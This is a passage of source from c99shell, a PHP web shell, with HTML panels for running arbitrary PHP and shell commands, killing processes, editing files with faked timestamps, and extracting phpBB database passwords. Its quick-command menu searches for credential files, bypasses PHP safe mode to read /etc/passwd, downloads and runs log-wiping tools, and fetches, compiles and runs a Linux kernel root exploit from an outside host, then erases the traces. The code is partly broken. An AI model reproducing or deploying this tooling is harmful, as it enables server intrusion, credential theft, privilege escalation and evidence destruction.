<u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u>

<TABLE width=100% id=bordered>
<input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; foreach($table as $row) { echo "\r\n"; foreach($row as $v) {echo "".$v."\r\n";} echo "\r\n"; } echo "<hr size=\"1\" noshade><p align=\"right\"> <script> function ls_setcheckboxall(status) { var id = 1; var num = ".(count($table)-2)."; while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; } } function ls_reverse_all() { var id = 1; var num = ".(count($table)-2)."; while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; } } </script> <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> "; if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) { echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; } echo "<select name=act><option value=\"".$act."\">With selected:</option>"; echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; if ($usefsbuff) { echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; } echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; echo ""; }}if ($act == "processes"){ echo "Processes:
"; if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");} else {$handler = "tasklist";} $ret = myshellexec($handler); if (!$ret) {echo "
Can't execute \"".$handler."\"!";} else { if (empty($processes_sort)) {$processes_sort = $sort_default;} $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} $k = $parsesort[0]; if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";} else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";} $ret = htmlspecialchars($ret); if (!$win) { if ($pid) { if (is_null($sig)) {$sig = 9;} echo "Sending signal ".$sig." to #".$pid."... "; if (posix_kill($pid,$sig)) {echo "OK.";} else {echo "ERROR.";} } while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $stack = explode("\n",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); for($i=0;$i<count($head);$i++) { if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\">".$head[$i]."</a>";} } $prcs = array(); foreach ($stack as $line) { if (!empty($line)){ echo ""; $line = explode(" ",$line); $line[10] = join(" ",array_slice($line,10)); $line = array_slice($line,0,11); if ($line[0] == get_current_user()) {$line[0] = "<font color=red>".$line[0]."</font>";} $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; $prcs[] = $line; echo ""; } } } else { while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg("",$ret)) {$ret = str_replace("","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} $ret = convert_cyr_string($ret,"d","w"); $stack = explode("\n",$ret); unset($stack[0],$stack[2]); $stack = array_values($stack); $head = explode("",$stack[0]); $head[1] = explode(" ",$head[1]); $head[1] = $head[1][0]; $stack = array_slice($stack,1); unset($head[2]); $head = array_values($head); if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";} else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";} if ($k > count($head)) {$k = count($head)-1;} for($i=0;$i<count($head);$i++) { if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\">".trim($head[$i])."</a>";} } $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo ""; $line = explode("",$line); $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); $line[2] = intval(str_replace(" ","",$line[2]))*1024; $prcs[] = $line; echo ""; } } } $head[$k] = "".$head[$k]."".$y; $v = $processes_sort[0]; usort($prcs,"tabsort"); if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} $tab = array(); $tab[] = $head; $tab = array_merge($tab,$prcs); echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; foreach($tab as $i=>$k) { echo ""; foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "".$v."";} echo ""; } echo ""; }}if ($act == "eval"){ if (!empty($eval)) { echo "Result of execution this PHP-code:
"; $tmp = ob_get_contents(); $olddir = realpath("."); @chdir($d); if ($tmp) { ob_clean(); eval($eval); $ret = ob_get_contents(); $ret = convert_cyr_string($ret,"d","w"); ob_clean(); echo $tmp; if ($eval_txt) { $rows = count(explode("\r\n",$ret))+1; if ($rows < 10) {$rows = 10;} echo "
<textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; } else {echo $ret."
";} } else { if ($eval_txt) { echo "
<textarea cols=\"122\" rows=\"15\" readonly>"; eval($eval); echo "</textarea>"; } else {echo $ret;} } @chdir($olddir); } else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} echo "
<input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\">

<input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo ">
";}if ($act == "f"){ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { if (file_exists($d.$f)) {echo "
Permision denied (".htmlspecialchars($d.$f).")!
";} else {echo "
File does not exists (".htmlspecialchars($d.$f).")!
<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a>
";} } else { $r = @file_get_contents($d.$f); $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} if (empty($ft)) {$ft = $rft;} $arr = array( array("[hex]","info"), array("[html]","html"), array("[txt]","txt"), array("[Code]","code"), array("[Session]","phpsess"), array("[exe]","exe"), array("[SDB]","sdb"), array("[gif]","img"), array("[ini]","ini"), array("[download]","download"), array("[rtf]","notepad"), array("[change]","edit") ); echo "Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."
Select action/file-type:
"; foreach($arr as $t) { if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=red>".$t[0]."</font></a>";} elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><u>".$t[0]."</u></a>";} else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\">".$t[0]."</a>";} echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; } echo "<hr size=\"1\" noshade>"; if ($ft == "info") { echo "Information:<table border=0 cellspacing=1 cellpadding=2>Path ".$d.$f."Size ".view_size(filesize($d.$f))."MD5 ".md5_file($d.$f).""; if (!$win) { echo "Owner/Group "; $ow = posix_getpwuid(fileowner($d.$f)); $gr = posix_getgrgid(filegroup($d.$f)); echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); } echo "Perms<a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a>Create time ".date("d/m/Y H:i:s",filectime($d.$f))."Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."
"; $fi = fopen($d.$f,"rb"); if ($fi) { if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} $n = 0; $a0 = "00000000
"; $a1 = ""; $a2 = ""; for ($i=0; $i<strlen($str); $i++) { $a1 .= sprintf("%02X",ord($str[$i]))." "; switch (ord($str[$i])) { case 0: $a2 .= "<font>0</font>"; break; case 32: case 10: case 13: $a2 .= "&nbsp;"; break; default: $a2 .= htmlspecialchars($str[$i]); } $n++; if ($n == $hexdump_rows) { $n = 0; if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."
";} $a1 .= "
"; $a2 .= "
"; } } //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
";} echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><td bgcolor=#666666>".$a0."<td bgcolor=000000>".$a1."<td bgcolor=000000>".$a2."
"; } $encoded = ""; if ($base64 == 1) { echo "Base64 Encode
"; $encoded = base64_encode(file_get_contents($d.$f)); } elseif($base64 == 2) { echo "Base64 Encode + Chunk
"; $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); } elseif($base64 == 3) { echo "Base64 Encode + Chunk + Quotes
"; $encoded = base64_encode(file_get_contents($d.$f)); $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); } elseif($base64 == 4) { $text = file_get_contents($d.$f); $encoded = base64_decode($text); echo "Base64 Decode"; if (base64_encode($encoded) != $text) {echo " (failed)";} echo "
"; } if (!empty($encoded)) { echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea>

"; } echo "HEXDUMP:<nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]
Base64: <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr><nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr><nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr><nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr><P>"; } elseif ($ft == "html") { if ($white) {@ob_clean();} echo $r; if ($white) {c99shexit();} } elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} elseif ($ft == "phpsess") { echo "<pre>"; $v = explode("|",$r); echo $v[0]."
"; var_dump(unserialize($v[1])); echo "</pre>"; } elseif ($ft == "exe") { $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach($exeftypes as $k=>$v) { if (in_array($ext,$v)) {$rft = $k; break;} } $cmd = str_replace("%f%",$f,$rft); echo "Execute file:
<input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\">
Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\">
<input type=submit name=submit value=\"Execute\">
"; } elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} elseif ($ft == "code") { if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) { $arr = explode("\n",$r); if (count($arr == 18)) { include($d.$f); echo "phpBB configuration is detected in this file!
"; if ($dbms == "mysql4") {$dbms = "mysql";} if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><u>Connect to DB</u></a>

";} else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} echo "Parameters for manual connect:
"; $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
";} echo "
<hr size=\"1\" noshade>"; } } echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; if (!empty($white)) {@ob_clean();} highlight_file($d.$f); if (!empty($white)) {c99shexit();} echo "</div>"; } elseif ($ft == "download") { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".filesize($d.$f)); header("Content-disposition: attachment; filename=\"".$f."\";"); echo $r; exit; } elseif ($ft == "notepad") { @ob_clean(); header("Content-type: text/plain"); header("Content-disposition: attachment; filename=\"".$f.".txt\";"); echo($r); exit; } elseif ($ft == "img") { $inf = getimagesize($d.$f); if (!$white) { if (empty($imgsize)) {$imgsize = 20;} $width = $inf[0]/100*$imgsize; $height = $inf[1]/100*$imgsize; echo "
Size:&nbsp;"; $sizes = array("100","50","20"); foreach ($sizes as $v) { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; if ($imgsize != $v ) {echo $v;} else {echo "<u>".$v."</u>";} echo "</a>&nbsp;&nbsp;&nbsp;"; } echo "

<img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\">
"; } else { @ob_clean(); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; header("Content-type: ".$inf["mime"]); readfile($d.$f); exit; } } elseif ($ft == "edit") { if (!empty($submit)) { if ($filestealth) {$stat = stat($d.$f);} $fp = fopen($d.$f,"w"); if (!$fp) {echo "Can't write to file!";} else { echo "Saved!"; fwrite($fp,$edit_text); fclose($fp); if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} $r = $edit_text; } } $rows = count(explode("\r\n",$r)); if ($rows < 10) {$rows = 10;} if ($rows > 30) {$rows = 30;} echo "
<input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\">
<textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea>
"; } elseif (!empty($ft)) {echo "
Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
";} else {echo "
Unknown extension (".$ext."), please, select type manually.
";} }}}else{ @ob_clean(); //For simple size- and speed-optimization. $imgequals = array( "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), "ext_html"=>array("ext_html","ext_htm"), "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), "ext_lnk"=>array("ext_lnk","ext_url"), "ext_ini"=>array("ext_ini","ext_css","ext_inf"), "ext_doc"=>array("ext_doc","ext_dot"), "ext_js"=>array("ext_js","ext_vbs"), "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), "ext_wri"=>array("ext_wri","ext_rtf"), "ext_swf"=>array("ext_swf","ext_fla"), "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") ); if (!$getall) { header("Content-type: image/gif"); header("Cache-control: public"); header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); header("Cache-control: max-age=".(60*60*24*7)); header("Last-Modified: ".date("r",filemtime(__FILE__))); foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} if (empty($images[$img])) {$img = "small_unk";} if (in_array($img,$ext_tar)) {$img = "ext_tar";} echo base64_decode($images[$img]); } else { foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
");}}}} natsort($images); $k = array_keys($images); echo "
"; foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\">
";} echo "
"; } exit;}<a bookmark="minipanel">
<TABLE width=100% id=bordered><td width="100%" height="1" valign="top">
<input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute">
<TABLE width=100% id=bordered> <td width="50%" height="83" valign="top">
<div align="center"><br/> Quick Commands </div>
<div align="center"> <input type=hidden name=act value="cmd"> <input type=hidden name="d" value=" echo $dispd; "> <SELECT NAME="cmd"> <OPTION VALUE="#"> [File Manipulation] <OPTION VALUE=""> <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory <OPTION VALUE="find / -type f -name "config*">Find config* files <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files <OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files <OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs <OPTION VALUE=""> <OPTION VALUE="#"> [Directory Malipulation] <OPTION VALUE=""> <OPTION VALUE="pwd">List your current directory <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable? <OPTION VALUE="find / -type d -perm -2 -ls">Find all writable directories<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory<OPTION VALUE="find / -type d -perm -2 -ls">Find all writable directories<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory<OPTION VALUE=""> <OPTION VALUE="#"> [Miscellaneous Commands]<OPTION VALUE=""> <OPTION VALUE="tar -cvf NEWTAR!!.tar -c passthru('pwd'); ">Tar your current directory. (Only works if the directory is writable) <OPTION VALUE="uname -a">Kernel version <OPTION VALUE="w">Logged in users <OPTION VALUE="lastlog">Last users to connect <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo <OPTION VALUE="netstat -atup | grep IST">Open ports <OPTION VALUE=""> <OPTION VALUE="#"> [Application Verification] <OPTION VALUE=""> <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera) <OPTION VALUE="locate gcc">Check For GCC <OPTION VALUE=""> <OPTION VALUE="#"> [Log Cleaners] <OPTION VALUE=""> <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3) <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3) <OPTION VALUE="./logcleaner-0.3 echo $_SERVER["REMOTE_ADDR"]; ">Wipelogs (Part 3)(Zap3) <OPTION VALUE="Gone! if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ">Remove All Zap3 Traces <OPTION VALUE=""> <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish) <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish) <OPTION VALUE="./vanish echo exec('whoami'); echo $_SERVER["REMOTE_ADDR"]; echo gethostbyname($_SERVER["HTTP_HOST"]); ">Wipelogs (Part 3)(Vanish) <OPTION VALUE="Gone!! if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ">Remove All Vanish Traces <OPTION VALUE=""> <OPTION VALUE="#"> [Root Exploits] <OPTION VALUE=""> <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - Local Root Exploit (Part 1) <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - Local Root Exploit (Part 2) <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - Local Root Exploit (Part 3) <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - Local Root Exploit (Part 4) <OPTION VALUE="Gone!!! if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ">Remove All Exploit Traces </SELECT> <input type=hidden name="cmd_txt" value="1"> &nbsp; <input type=submit name=submit value="Execute"></div>
<td width="50%" height="83" valign="top">
<br/> Kernel Information
<input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value=" echo wordwrap(Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64); " size=80>&nbsp;<input type=submit value="Search" name=btnG>
<TABLE width=100% id=bordered> <td width="50%" height="83" valign="top">
<div align="center"><strong>PHP Safe-Mode Bypass (Read Files) </strong></div>
<div align="center"> File:

eg: /etc/passwd
function rsg_read() { $test=""; $temp=tempnam($test, "cx"); $file=$_REQUEST['file']; $get=htmlspecialchars($file); echo "
Trying To Get File <font color=#000099>$get</font>
"; if(copy("compress.zlib://".$file, $temp)){ $fichier = fopen($temp, "r"); $action = fread($fichier, filesize($temp)); fclose($fichier); $source=htmlspecialchars($action); echo "<div class=\"shell\">
Reading $get:

<textarea rows=10 cols=50>$source</textarea>
"; unlink($temp); } else { echo("
<FONT COLOR=\"RED\"><CENTER>Sorry... File <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>"); } echo "</div>"; } if(isset($_REQUEST['file'])){rsg_read();} function rsg_glob(){$chemin=$_REQUEST['directory'];$files = glob("$chemin*");echo "
Trying To List Folder <font color=#000099>$chemin</font>
";foreach ($files as $filename) { echo "<pre>"; echo "$filename\n"; echo "</pre>";}}if(isset($_REQUEST['directory'])){rsg_glob();}
<td width="50%" height="83" valign="top">
<strong>PHP Safe-Mode Bypass (List Directories)</strong>:
<div align="center">

eg: /etc/
<TABLE width=100% id=bordered> <td width="50%" height="1" valign="top">
&nbsp; - regexp&nbsp;<input type=submit name=submit value="Search">
</p> <td width="50%" height="1" valign="top">
<input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload">
echo $wdt;

<TABLE width=100% id=bordered><td width="50%" height="1" valign="top">
<strong>Create Directory </strong> <p>
&nbsp;<input type=submit value="Create">
echo $wdt;
<td width="50%" height="1" valign="top">
<strong>Create File </strong>
<input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create">
echo $wdt;

<TABLE width=100% id=bordered><td width="50%" height="1" valign="top">
Enter Directory
&nbsp;<input type=submit value="Go">
<td width="50%" height="1" valign="top">
Access File
&nbsp;<input type=submit value="Go">

<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><td width="990" height="1" valign="top"><p align="center">--[ c99shell Editing by <a href=http://devilzc0de.org/ class="style1">jos_ali_joe</a>. | echo("$shver"); ]--</p><br/> chdir($lastdir); c99shexit();